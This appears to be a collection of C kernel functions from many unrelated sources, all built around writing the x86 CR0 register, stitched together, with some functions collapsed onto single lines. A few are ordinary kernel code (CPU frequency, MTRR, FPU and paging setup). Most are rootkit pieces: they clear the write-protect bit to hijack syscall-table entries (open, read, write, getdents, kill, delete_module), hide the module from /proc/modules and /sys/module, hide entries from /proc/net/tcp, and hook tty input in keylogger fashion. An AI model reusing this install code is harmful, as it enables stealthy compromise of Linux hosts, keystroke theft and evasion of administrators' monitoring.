/*
 * Program the K6 frequency multiplier for the chosen table index.
 * The whole sequence runs with IRQs off and the cache disabled, and the
 * statement order is hardware-mandated (see AMD#23446).
 */
static void powernow_k6_set_cpu_multiplier(unsigned int best_i)
{
	unsigned long outvalue, invalue;
	unsigned long msrval;
	unsigned long cr0;

	/* we now need to transform best_i to the BVC format, see AMD#23446 */

	/*
	 * The processor doesn't respond to inquiry cycles while changing the
	 * frequency, so we must disable cache.
	 */
	local_irq_disable();
	cr0 = read_cr0();
	write_cr0(cr0 | X86_CR0_CD);	/* set Cache Disable */
	wbinvd();			/* flush caches */

	/* Build the BVC command word from the multiplier register code. */
	outvalue = (1<<12) | (1<<10) | (1<<9) | (index_to_register[best_i]<<5);

	msrval = POWERNOW_IOPORT + 0x1;
	wrmsr(MSR_K6_EPMR, msrval, 0);	/* enable the PowerNow port */
	/* Preserve the low 5 bits currently latched in the port. */
	invalue = inl(POWERNOW_IOPORT + 0x8);
	invalue = invalue & 0x1f;
	outvalue = outvalue | invalue;
	outl(outvalue, (POWERNOW_IOPORT + 0x8));
	msrval = POWERNOW_IOPORT + 0x0;
	wrmsr(MSR_K6_EPMR, msrval, 0);	/* disable it again */

	/* Restore the saved CR0 (re-enables the cache) and IRQs. */
	write_cr0(cr0);
	local_irq_enable();
}
/*
 * Module init: locate the syscall table, make its pages writable, and
 * replace the __NR_open entry with my_sys_open, saving the original in
 * orig_sys_open. Returns 0 on success, -1 if the table is not found.
 * NOTE(review): this is a syscall-table hijack. The pages made writable
 * via set_memory_rw() are never set back to read-only in this function.
 */
static int __init syscall_init(void)
{
	int ret;
	unsigned long addr;
	unsigned long cr0;

	syscall_table = (void **)find_sys_call_table();
	if (!syscall_table) {
		printk(KERN_DEBUG "Cannot find the system call address\n");
		return -1;
	}

	cr0 = read_cr0();
	write_cr0(cr0 & ~CR0_WP);	/* drop the CR0 write-protect bit */

	addr = (unsigned long)syscall_table;
	/* Make the three pages around the table writable. */
	ret = set_memory_rw(PAGE_ALIGN(addr) - PAGE_SIZE, 3);
	if(ret) {
		printk(KERN_DEBUG "Cannot set the memory to rw (%d) at addr %16lX\n",
		       ret, PAGE_ALIGN(addr) - PAGE_SIZE);
	} else {
		printk(KERN_DEBUG "3 pages set to rw");
	}

	/* Save the original handler, then install the replacement. */
	orig_sys_open = syscall_table[__NR_open];
	syscall_table[__NR_open] = my_sys_open;

	write_cr0(cr0);			/* restore the saved CR0 (WP back on) */
	return 0;
}
/*
 * Module init: unlinks this module from /proc/modules and /sys/module
 * (rootkit-style self-hiding), then hooks the open(2) entry in the
 * syscall table, keeping the original in original_open.
 */
static int __init hidden_init(void)
{
	printk(KERN_INFO "Starting up module.\n");

	/* Hide the module from proc/modules, Sys/modules tracking. */
	list_del_init(&__this_module.list);
	kobject_del(&THIS_MODULE->mkobj.kobj);

	/* Locate address of the Syscall table in memory. */
	if(!(sys_call_table = get_sys_call_table())) {
		printk(KERN_INFO "Unable to locate Syscall table.");
		return -1;
	}

	/* Disabling WP bit in control register cr0 to write to sys_call table. */
	write_cr0(read_cr0() & (~ 0x10000));

	/* Store open system call to use later. */
	original_open = (void *)sys_call_table[__NR_open];

	/* Write our modified read call to the syscall table. */
	/* NOTE(review): comment says "read" but the hooked entry is open. */
	sys_call_table[__NR_open] = (unsigned long *) hidden_open;

	/* Turning WP bit back on. */
	write_cr0(read_cr0() | 0x10000);

	return 0;
}
/*
 * Installs hooks over the time-setting syscalls (settimeofday, adjtimex,
 * clock_settime). Refuses to run unless the earlier table lookup
 * succeeded (success == 1) and the hooks are not already installed.
 * NOTE(review): this tampers with the kernel syscall table.
 */
void enable_hack(){
	if (success!=1) {
		printk(KERN_INFO "Cannot enable, succes!=1\n");
		return;
	}
	if (hacked) {
		printk(KERN_INFO "Already hooked\n");
		return;
	}
	hacked=1;

	// disable kernel page write protection
	write_cr0 (read_cr0 () & (~ 0x10000));

	// redirect system call to our wrapper routine
	//sys_call_table[__NR_getdents64] = hacked_getdents;
	sys_call_table[__NR_settimeofday] = hacked_settimeofday;
	sys_call_table[__NR_adjtimex] = hacked_adjtimex;
	sys_call_table[__NR_clock_settime] = hacked_clock_settime;

	// enable kernel page write protection back
	write_cr0 (read_cr0 () | 0x10000);

	printk(KERN_INFO "Syscall tampered #3. new clock_settime=%p\n",
	       (void*) sys_call_table[__NR_clock_settime]);
}
/*!
 * @fn void cpumon_Set_IDT_Func(idt, func)
 *
 * @param GATE_STRUCT* - address of the idt vector
 * @param PVOID - function to set in IDT
 *
 * @return None No return needed
 *
 * @brief Set up the interrupt handler.
 * @brief Save the old handler for restoration when done
 *
 */
static VOID cpumon_Set_IDT_Func (
    GATE_STRUCT  *idt,
    PVOID         func
)
{
#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,25)
    /* Old kernels export _set_gate(); install directly (DPL 3). */
    _set_gate(&idt[CPU_PERF_VECTOR], GATE_INTERRUPT, (unsigned long) func, 3, 0);
#else
#if LINUX_VERSION_CODE >= KERNEL_VERSION(3,10,0)
    unsigned long cr0_value;
#endif
    GATE_STRUCT  local;
    // _set_gate() cannot be used because the IDT table is not exported.
    pack_gate(&local, GATE_INTERRUPT, (unsigned long)func, 3, 0, __KERNEL_CS);
    // From 3.10 kernel, the IDT memory has been moved to a read-only location
    // which is controlled by the bit 16 in the CR0 register.
    // The write protection should be temporarily released to update the IDT.
#if LINUX_VERSION_CODE >= KERNEL_VERSION(3,10,0)
    cr0_value = read_cr0();
    write_cr0(cr0_value & ~X86_CR0_WP);
#endif
    // NOTE(review): the previous handler is not saved in this function,
    // despite the @brief above — confirm the save happens in the caller.
    write_idt_entry((idt), CPU_PERF_VECTOR, &local);
#if LINUX_VERSION_CODE >= KERNEL_VERSION(3,10,0)
    write_cr0(cr0_value);   /* restore the original WP setting */
#endif
#endif
    return;
}
//The code that gets executed when the module is loaded static int initialize_sneaky_module(void) { struct page *page_ptr; //See /var/log/syslog for kernel print output printk(KERN_INFO "Sneaky module being loaded.\n"); printk(KERN_INFO "PID is %d\n", PID); //Turn off write protection mode write_cr0(read_cr0() & (~0x10000)); //Get a pointer to the virtual page containing the address //of the system call table in the kernel. page_ptr = virt_to_page(&sys_call_table); //Make this page read-write accessible pages_rw(page_ptr, 1); //This is the magic! Save away the original 'open' system call //function address. Then overwrite its address in the system call //table with the function address of our new code. original_call = (void*)*(sys_call_table + __NR_open); *(sys_call_table + __NR_open) = (unsigned long)sneaky_sys_open; //getdents original_getdents = (void*)*(sys_call_table + __NR_getdents); *(sys_call_table + __NR_getdents) = (unsigned long)sneaky_sys_getdents; //read original_read = (void*)*(sys_call_table + __NR_read); *(sys_call_table + __NR_read) = (unsigned long)sneaky_sys_read; //Revert page to read-only pages_ro(page_ptr, 1); //Turn write protection mode back on write_cr0(read_cr0() | 0x10000); return 0; // to show a successful load }
/*
 * Module exit: frees the control socket and puts the saved mkdir(2)
 * handler back into the syscall table (WP bit toggled around the write).
 */
void cleanup_module()
{
	kfree(sock);

	/* Reset the "open" system call */
	/* NOTE(review): comment says "open" but the entry restored is mkdir. */
	write_cr0 (read_cr0 () & (~ 0x10000));
	syscall_table[__NR_mkdir] = original_mkdir;
	write_cr0 (read_cr0 () | 0x10000);

	printk(KERN_ALERT "HIJACK EXIT\n");
}
/*
 * Module init: exchanges tty_insert_flip_char for my_tty_insert_flip_char
 * (keylogger-style kernel-function hook), keeping the original pointer in
 * o_tty_insert_flip_char. CR0.WP is cleared around the xchg.
 */
static int _init(void)
{
	printk("rootkit loaded\n");

	/*list_del_init(&__this_module.list);*/      /* /proc/modules */
	/*kobject_del(&THIS_MODULE->mkobj.kobj);*/   /* /sys/modules */

	write_cr0(read_cr0() & (~ 0x10000));
	printk("tty_insert_flip_char: %p\n", tty_insert_flip_char);
	o_tty_insert_flip_char = (void *) xchg(tty_insert_flip_char, my_tty_insert_flip_char);
	write_cr0(read_cr0() | 0x10000);

	return 0;
}
/*
 * Module exit: puts the saved original open(2) handler back into the
 * syscall table, clearing CR0.WP only for the duration of the write.
 */
static void __exit syscall_release(void)
{
	unsigned long cr0;

	cr0 = read_cr0();
	write_cr0(cr0 & ~CR0_WP);	/* allow writes to read-only pages */
	syscall_table[__NR_open] = orig_sys_open;
	write_cr0(cr0);			/* restore the saved CR0 (WP back on) */
}
/*
 * Module exit: re-locates the syscall table and swaps the original
 * getdents64 handler back in; no-op (apart from the log line) when the
 * table cannot be found.
 */
void _exit(void)
{
	my_type* syscalltable = 0;

	syscalltable = (my_type* ) find();
	if (syscalltable != 0) {
		write_cr0(read_cr0() & (~ 0x10000));	/* drop WP */
		xchg(&syscalltable[__NR_getdents64], o_getdents64);
		write_cr0(read_cr0() | 0x10000);	/* WP back on */
	}
	printk("rootkit removed\n");
}
/*
 * Module exit: restores the saved read(2)/open(2) handlers.
 * Uses original_cr0 captured at init time: first written with the WP
 * bit masked off, then written back verbatim afterwards.
 */
static void __exit jackle_end( void )
{
	if( !sys_call_table ) {
		return;
	}

	write_cr0( original_cr0 & ~0x00010000 );	/* drop WP */
	sys_call_table[__NR_read] = ( unsigned long * )ref_sys_read;
	sys_call_table[__NR_open] = ( unsigned long * )ref_sys_open;
	write_cr0( original_cr0 );			/* restore saved CR0 */
}
// rm the kmod static void exit(void) { write_cr0 (read_cr0 () & (~ 0x10000)); // YOUR CODE HERE! // hint: you unhook here write_cr0 (read_cr0 () | 0x10000); printk(KERN_ALERT "MODULE EXIT\n"); }
/*
 * Module init: saves the original write(2) handler in original_write and
 * installs new_write in its place (CR0.WP cleared around the table write).
 */
static int init(void)
{
	printk(KERN_ALERT "\nHIJACK INIT\n");

	write_cr0 (read_cr0 () & (~ 0x10000));
	original_write = (void *)syscall_table[__NR_write];
	syscall_table[__NR_write] = new_write;
	write_cr0 (read_cr0 () | 0x10000);

	return 0;
}
/*
 * Module exit: restores the saved write(2) handler into the syscall
 * table, toggling the CR0 write-protect bit around the store.
 */
static void exit(void)
{
	write_cr0 (read_cr0 () & (~ 0x10000));
	syscall_table[__NR_write] = original_write;
	write_cr0 (read_cr0 () | 0x10000);

	printk(KERN_ALERT "MODULE EXIT\n");
	return;
}
/*
 * Module exit: puts the saved read(2) handler back. Re-uses original_cr0
 * captured at init time instead of re-reading CR0 here.
 */
static void __exit rootkit_end(void)
{
	if(!sys_call_table) {
		return;
	}

	// turn off memory protection
	write_cr0(original_cr0 & ~0x00010000);

	// put the old system call back in place
	sys_call_table[__NR_read] = (unsigned long *)ref_sys_read;

	// memory protection back on
	write_cr0(original_cr0);
}
/*init module insmod*/
/*
 * Module init: unlinks the module from /proc/modules, installs hooks over
 * read/write, getdents(64), unlink/rmdir/unlinkat/rename, open, kill and
 * delete_module, then replaces the /proc/net/tcp seq_ops.show handler
 * with h4x_tcp4_seq_show.
 * NOTE(review): declarations follow a statement (needs C99/gnu mixed
 * declarations), and the while loop assumes a "tcp" proc entry always
 * exists — it would dereference NULL otherwise.
 */
static int init(void)
{
	//Uncomment to hide this module
	list_del_init(&__this_module.list);

	struct tcp_seq_afinfo *my_afinfo = NULL;
	//proc_net is disappeared in 2.6.32, use init_net.proc_net
	struct proc_dir_entry *my_dir_entry = init_net.proc_net->subdir;

	write_cr0 (read_cr0 () & (~ 0x10000));	/* drop WP */

	if(_KEYLOG_){
		o_read=(void *)sys_call_table[__NR_read];
		sys_call_table[__NR_read]=h4x_read;
	}
	o_write=(void *)sys_call_table[__NR_write];
	sys_call_table[__NR_write]=h4x_write;

#if defined(__x86_64__)
	o_getdents=sys_call_table [__NR_getdents];
	sys_call_table [__NR_getdents]=h4x_getdents;
#elif defined(__i386__)
	o_getdents64=sys_call_table [__NR_getdents64];
	sys_call_table [__NR_getdents64]=h4x_getdents64;
#else
#error Unsupported architecture
#endif

	o_unlink = sys_call_table [__NR_unlink];
	sys_call_table [__NR_unlink] = h4x_unlink;
	o_rmdir = sys_call_table [__NR_rmdir];
	sys_call_table [__NR_rmdir] = h4x_rmdir;
	o_unlinkat = sys_call_table [__NR_unlinkat];
	sys_call_table [__NR_unlinkat] = h4x_unlinkat;
	o_rename = sys_call_table [__NR_rename];
	sys_call_table [__NR_rename] = h4x_rename;
	o_open = sys_call_table [__NR_open];
	sys_call_table [__NR_open] = h4x_open;
	o_kill = sys_call_table [__NR_kill];
	sys_call_table [__NR_kill] = h4x_kill;
	o_delete_module = sys_call_table [__NR_delete_module];
	sys_call_table [__NR_delete_module] = h4x_delete_module;

	write_cr0 (read_cr0 () | 0x10000);	/* WP back on */

	/* Walk the proc net directory until the "tcp" entry is found. */
	while(strcmp(my_dir_entry->name, "tcp"))
		my_dir_entry = my_dir_entry->next;

	if((my_afinfo = (struct tcp_seq_afinfo*)my_dir_entry->data))
	{
		//seq_show is disappeared in 2.6.32, use seq_ops.show
		old_tcp4_seq_show = my_afinfo->seq_ops.show;
		my_afinfo->seq_ops.show = h4x_tcp4_seq_show;
	}
	return 0;
}
/*
 * Module init: connects the control socket, then hooks mkdir(2) in the
 * syscall table, saving the original handler in original_mkdir.
 */
int init_module()
{
	printk(KERN_ALERT "\nHIJACK INIT\n");

	if (do_connect())
		printk(KERN_ALERT "Error initializing control socket.\n");

	/* Override the "open" system call */
	/* NOTE(review): comment says "open" but the hooked entry is mkdir. */
	write_cr0 (read_cr0 () & (~ 0x10000));
	original_mkdir = (void *)syscall_table[__NR_mkdir];
	syscall_table[__NR_mkdir] = new_mkdir;
	write_cr0 (read_cr0 () | 0x10000);

	return 0;
}
// install the kmod static int init(void) { printk(KERN_ALERT "Entering the kernel\n"); // disable write protection, flip bit write_cr0 (read_cr0 () & (~ 0x10000)); // YOUR CODE HERE! // hint: you do the hook here // enable write protection, flip bit write_cr0 (read_cr0 () | 0x10000); return 0; }
/*
 * Re-assert CR0.WP (bit 16) so ring-0 writes to read-only page
 * mappings are refused again.
 */
static void enable_page_protection(void)
{
	unsigned long value = read_cr0();

	write_cr0(value | (1 << 16));
}
/* Put the processor into a state where MTRRs can be safely set */
void set_mtrr_prepare_save(struct set_mtrr_context *ctxt)
{
	unsigned int cr0;

	/* Disable interrupts locally */
	local_irq_save(ctxt->flags);

	if (use_intel() || is_cpu(CYRIX)) {

		/* Save value of CR4 and clear Page Global Enable (bit 7) */
		if ( cpu_has_pge ) {
			ctxt->cr4val = read_cr4();
			write_cr4(ctxt->cr4val & ~X86_CR4_PGE);
		}

		/* Disable and flush caches. Note that wbinvd flushes the TLBs as
		   a side-effect. 0x40000000 is CR0.CD (Cache Disable, bit 30). */
		cr0 = read_cr0() | 0x40000000;
		wbinvd();
		write_cr0(cr0);
		wbinvd();

		if (use_intel())
			/* Save MTRR state */
			rdmsr(MTRRdefType_MSR, ctxt->deftype_lo, ctxt->deftype_hi);
		else
			/* Cyrix ARRs - everything else were excluded at the top */
			ctxt->ccr3 = getCx86(CX86_CCR3);
	}
}
/* Restore the processor after a set_mtrr_prepare */
void set_mtrr_done(struct set_mtrr_context *ctxt)
{
	if (use_intel() || is_cpu(CYRIX)) {

		/* Flush caches and TLBs */
		wbinvd();

		/* Restore MTRRdefType */
		if (use_intel())
			/* Intel (P6) standard MTRRs */
			mtrr_wrmsr(MTRRdefType_MSR, ctxt->deftype_lo, ctxt->deftype_hi);
		else
			/* Cyrix ARRs - everything else was excluded at the top */
			setCx86(CX86_CCR3, ctxt->ccr3);

		/* Enable caches: 0xbfffffff clears CR0.CD (bit 30) */
		write_cr0(read_cr0() & 0xbfffffff);

		/* Restore value of CR4 */
		if ( cpu_has_pge )
			write_cr4(ctxt->cr4val);
	}
	/* Re-enable interrupts locally (if enabled previously) */
	local_irq_restore(ctxt->flags);
}
/*
 * Turn the CR0 write-protect bit (bit 16, mask 0x10000) back on so
 * the CPU again honors read-only page mappings in ring 0.
 */
static void enable_page_protection(void)
{
	unsigned long cr0 = read_cr0();

	cr0 |= 0x10000;
	write_cr0(cr0);
}
/* * The earliest FPU detection code. * * Set the X86_FEATURE_FPU CPU-capability bit based on * trying to execute an actual sequence of FPU instructions: */ static void fpu__init_system_early_generic(struct cpuinfo_x86 *c) { unsigned long cr0; u16 fsw, fcw; fsw = fcw = 0xffff; cr0 = read_cr0(); cr0 &= ~(X86_CR0_TS | X86_CR0_EM); write_cr0(cr0); asm volatile("fninit ; fnstsw %0 ; fnstcw %1" : "+m" (fsw), "+m" (fcw)); if (fsw == 0 && (fcw & 0x103f) == 0x003f) set_cpu_cap(c, X86_FEATURE_FPU); else clear_cpu_cap(c, X86_FEATURE_FPU); #ifndef CONFIG_MATH_EMULATION if (!cpu_has_fpu) { pr_emerg("x86/fpu: Giving up, no FPU found and no math emulation present\n"); for (;;) asm volatile("hlt"); }
/* * Initialize the registers found in all CPUs, CR0 and CR4: */ static void fpu__init_cpu_generic(void) { unsigned long cr0; unsigned long cr4_mask = 0; if (cpu_has_fxsr) cr4_mask |= X86_CR4_OSFXSR; if (cpu_has_xmm) cr4_mask |= X86_CR4_OSXMMEXCPT; if (cr4_mask) cr4_set_bits(cr4_mask); cr0 = read_cr0(); cr0 &= ~(X86_CR0_TS|X86_CR0_EM); /* clear TS and EM */ if (!cpu_has_fpu) cr0 |= X86_CR0_EM; write_cr0(cr0); /* Flush out any pending x87 state: */ #ifdef CONFIG_MATH_EMULATION if (!cpu_has_fpu) fpstate_init_soft(¤t->thread.fpu.state.soft); else #endif asm volatile ("fninit"); }
/*
 * Undo the ia32 compat hooks: puts the saved adjtimex/clock_settime
 * entries back into the ia32 syscall table. No-op unless the earlier
 * lookup succeeded (success_ia32 == 1) and the hooks are installed.
 */
void disable_hack_ia32(){
	if (success_ia32!=1) return;
	if (!hacked_ia32) return;
	hacked_ia32=0;

	//
	// restore syscall table
	//
	write_cr0 (read_cr0 () & (~ 0x10000));
	ia32_sys_call_table[__NR_ia32_adjtimex]=orig_compat_sys_adjtimex;
	ia32_sys_call_table[__NR_ia32_clock_settime]=orig_compat_sys_clock_settime;
	write_cr0 (read_cr0 () | 0x10000);

	printk(KERN_INFO "Syscall restored ia32.\n");
}
/*
 * Build the initial top-level page table: identity-maps the address
 * space with 4MB pages, remapping the kernel's own slot back to
 * physical 0, then loads the table and enables PSE/PGE, paging and
 * caching.
 * NOTE(review): write_cr3() is given the table's virtual address —
 * this assumes virt == phys for that region at this point; confirm.
 */
static int __init x86_create_initial_map()
{
	unsigned long phy= 0;
	unsigned long *p = (unsigned long *)FAK_ARCH_X86_INIT_PGTABLE;	//The kernel topmost table
	int i;

	/* Start from an all-empty directory. */
	for (i = 0; i < 1024; i++)
		p[i] = 0;

	/* Kernel part in 4mb page; */
	for (i = 0; i < 1024; i++)
	{
		if (i == get_loaded_base() / 0x400000)
			phy = 0;	/* on reaching the kernel's slot, map from physical 0
					   again: the kernel actually sits at the start of
					   physical memory */
		p[i] = phy | 0x83;	/* present + rw + 4MB page; 0x183 is the global variant */
		phy += 0x400000;
	}

	write_cr3((unsigned long)p);

	phy = read_cr4();
	phy |= X86_CR4_PSE | X86_CR4_PGE;	/* allow 4MB pages */
	write_cr4(phy);

	phy = read_cr0();
	phy |= X86_CR0_PG;			/* turn paging on */
	phy &= ~(X86_CR0_CD | X86_CR0_NW);	/* allow caching */
	write_cr0(phy);
	return 0;
}
/*
 * Write the saved CR0 value back (restoring whatever WP setting it
 * carried) and leave the preempt-disabled section opened by the
 * matching disable helper.
 */
inline void restore_wp ( unsigned long cr0 ) {
	write_cr0(cr0);
	barrier();	/* keep the CR0 write ordered before re-enabling preemption */
	preempt_enable();
}
/*
 * Clear CR0.WP so ring-0 code can write through read-only mappings.
 * NOTE(review): 'cr0' is a file-scope variable, presumably holding a
 * previously read CR0 value — confirm it is current before each call.
 */
static inline void unprotect_memory(void)
{
	// CR0[16] is Write Protect Bit
	// CR0[16] is unset to disable Write Protect
	write_cr0(cr0 & ~0x00010000);
}
// cr0 is a control register in the x86 family of processors. // Bit 16 of that register is WP - Write protect: Determines whether // the CPU can write to pages marked read-only void enable_rw(void *ptr) { preempt_disable(); barrier(); original_rw_mask = read_cr0() & WRITE_PROTECT_MASK; write_cr0 (read_cr0() & (~ WRITE_PROTECT_MASK)); }
/* Enable paging on the CPU. Typically, a CPU start with paging disabled, and memory is accessed by addressing physical memory directly. After paging is enabled, memory is addressed logically. */ void PageTable::enable_paging() { //write the page_directory address into CR3 write_cr3((unsigned long)current_page_table->get_page_directory()); //set paging bit in CR0 to 1 write_cr0(read_cr0() | 0x80000000); }